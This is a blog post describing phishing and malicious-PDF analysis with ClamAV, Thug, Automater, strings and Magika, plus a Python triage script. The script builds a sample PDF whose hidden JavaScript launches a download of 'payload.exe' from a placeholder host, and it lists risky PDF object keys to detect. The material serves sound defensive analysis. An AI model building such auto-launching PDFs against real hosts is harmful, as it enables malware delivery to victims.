=========================
== Eduardo Robles Site ==
=========================
Hola Mundo 🌮

Easy DFIR Tools and Methods

Phishing Email Analysis

ClamAV

ClamAV is great for scanning files for malware, and it can also scan .eml files, including the attachments inside them. Add the --debug flag for more detail on what the scanner did. Keep the signature database current with freshclam before trusting a clean result; a scan with stale signatures proves little.

clamscan sample.eml

You can also use ClamAV to scan any suspicious file.

clamscan sample.zip

To investigate a link I use a REMnux container, which offers so many awesome tools. I will cover THUG and Automater.

THUG

THUG is a "honeyclient": a tool that mimics the behavior of a web browser so you can see what a link does when a user clicks it, without putting a real browser in front of it. The -u flag selects the browser personality (user agent and plugins) that Thug emulates, which matters because malicious pages often serve different content to different browsers.

thug -u win7chrome49 "https://eduardorobles.com"

As it "loads" the suspicious site, Thug executes whatever client-side code the page serves (JavaScript, redirects, plugin content) inside its emulated browser. When the page finishes loading it writes a report summarizing what occurred, along with any artifacts the page tried to download. Because it does fetch and execute hostile content, run it from an isolated analysis container or VM, never from a workstation on the corporate network.

In one exercise a suspicious page downloaded an executable, and I was able to analyze the executable from the container; it was indeed a malicious executable. Yikes!

Automater

Automater is a URL/domain, IP address, and MD5 hash OSINT tool aimed at making the analysis process easier for intrusion analysts. Given a target (URL, IP, or hash) or a file full of targets, Automater returns relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal. Because these are online lookups, the indicator leaves your network: don't submit targets that are themselves sensitive, and remember that a "no results" answer only means those services have not seen it yet.

Automater is a Python tool; in the REMnux container it is found in /usr/local/automater.

./Automater.py https://eduardorobles.com

Investigating a suspicious PDF

Malicious content in a PDF is embedded in its objects and streams, which are not visible to an end user viewing the document. Extract that content and inspect it rather than opening the file in a viewer.

Strings

The strings command prints the runs of printable characters in a file, which is a quick way to spot embedded URLs, object names such as /JavaScript or /OpenAction, and suspicious commands. Keep in mind that most PDF streams are compressed (FlateDecode), so strings only sees what is stored uncompressed; a PDF-aware tool is needed to look inside compressed streams.

strings sus_invoice.pdf | grep http

Piping the output through grep, as above, singles out things like http links or hashes.
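The following is an added example, not code from the original page or from any of the tools above. It shows, in Python with only the standard library, the triage steps the phishing-email and PDF sections describe: pull the attachments out of an .eml, hash them for lookups, check their magic bytes instead of trusting the declared type, extract URLs from the body, and look for risky objects inside a PDF attachment, including inside its FlateDecode-compressed streams, which strings cannot see into. The message, the PDF and every URL in it are constructed sample data (example.invalid is a reserved placeholder domain).

```python
"""Offline triage of a suspicious .eml: hash and type-check attachments,
pull URLs out of the body, and inspect PDF attachments including their
FlateDecode-compressed streams. Added example; all sample data is constructed."""
import email
import hashlib
import re
import zlib
from email import policy
from email.message import EmailMessage

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
# Object keys that commonly carry active content in malicious PDFs. Plain
# substring checks: hex-escaped names such as /Java#53cript are not handled.
RISKY_PDF_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                  b"/Launch", b"/EmbeddedFile", b"/URI")
# A stream object: its dictionary (one level of nesting allowed) then "stream".
STREAM_RE = re.compile(rb"<<((?:[^<>]|<<[^<>]*>>)*)>>\s*stream\r?\n", re.S)
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")  # direct lengths only

# Constructed sample: a PDF whose /OpenAction runs JavaScript stored in a
# compressed stream, so the raw file never contains the launchURL call.
_JS = b"app.launchURL('http://example.invalid/payload.exe');"
_JS_DEFLATED = zlib.compress(_JS)
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
    b"4 0 obj << /Length " + str(len(_JS_DEFLATED)).encode()
    + b" /Filter /FlateDecode >>\nstream\n" + _JS_DEFLATED
    + b"\nendstream endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
)


def pdf_streams(data: bytes):
    """Yield (dictionary, raw stream bytes) for every stream object in data."""
    for m in STREAM_RE.finditer(data):
        dictionary, start = m.group(1), m.end()
        length = LENGTH_RE.search(dictionary)
        if length:
            raw = data[start:start + int(length.group(1))]
        else:  # indirect /Length: fall back to the endstream keyword
            end = data.find(b"endstream", start)
            raw = data[start:end if end != -1 else len(data)]
        yield dictionary, raw


def inflate_streams(data: bytes) -> bytes:
    """Decompress every /FlateDecode stream; skip ones zlib cannot handle."""
    chunks = []
    for dictionary, raw in pdf_streams(data):
        if b"/FlateDecode" in dictionary:
            try:
                chunks.append(zlib.decompress(raw))
            except zlib.error:
                pass  # damaged or multi-filter stream: hand it to a PDF parser
    return b"\n".join(chunks)


def extract_urls(text: str) -> list[str]:
    return sorted(set(URL_RE.findall(text)))


def triage_pdf(data: bytes) -> dict:
    """Risky object keys and URLs, searched in raw bytes and inflated streams."""
    inflated = inflate_streams(data)
    return {
        "risky_keywords": [k.decode() for k in RISKY_PDF_KEYS
                           if k in data or k in inflated],
        "urls_in_raw": extract_urls(data.decode("latin-1")),
        "urls_in_streams": extract_urls(inflated.decode("latin-1")),
    }


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage_eml(raw: bytes) -> dict:
    """Parse an .eml, hash each attachment and inspect any that is a PDF."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html"))
    body_text = body.get_content() if body is not None else ""
    attachments = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""
        info = {"filename": part.get_filename(),
                "declared_type": part.get_content_type(),
                "size": len(payload), "sha256": sha256_hex(payload)}
        # Trust the magic bytes, not the declared MIME type or the extension.
        if payload.startswith(b"%PDF"):
            info["pdf"] = triage_pdf(payload)
        attachments.append(info)
    return {"from": str(msg["From"]), "subject": str(msg["Subject"]),
            "body_urls": extract_urls(body_text), "attachments": attachments}


def build_sample_eml() -> bytes:
    """Constructed phishing message with the sample PDF attached."""
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Overdue invoice"
    msg.set_content("Your invoice is overdue.\n"
                    "Pay now at http://example.invalid/pay or open the attachment.\n")
    msg.add_attachment(SAMPLE_PDF, maintype="application", subtype="pdf",
                       filename="sus_invoice.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    import json
    print(json.dumps(triage_eml(build_sample_eml()), indent=2))
```

Point it at a real message by reading the .eml bytes from disk instead of calling build_sample_eml(). The SHA-256 of each attachment is what you feed to Automater or VirusTotal, and the inflated stream text is exactly what a plain strings pass would have missed: in the sample, the only URL that appears in the raw file is the one in the message body, while the payload URL only shows up after decompression. The stream parser here is deliberately minimal (direct /Length values, one level of dictionary nesting, FlateDecode only); for object streams, other filters or deliberately malformed files, use a dedicated PDF parser from REMnux.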

Magika

Magika is a file-type identification tool released by Google. It classifies a file by its content using a trained model, rather than by its extension or a fixed table of magic bytes, so it helps when you stumble onto something and can't figure out what the file actually is. The pip package installs both a command-line tool and a Python library.

pip install magika

Thank You

If you enjoyed or found any of the content on my site helpful, you can buy me a cup of coffee or send some bitcoin ⚡ so I can continue to bring you amazing content for free!

You can Buy Me A Coffee

Tip with some Sats

Setup

  • Keyboard: Launch Keyboard with JWICK Ultimate Black Linear switches
  • Mouse: MX Master (Original)
  • Computer: Framework 13 (Fedora Linux)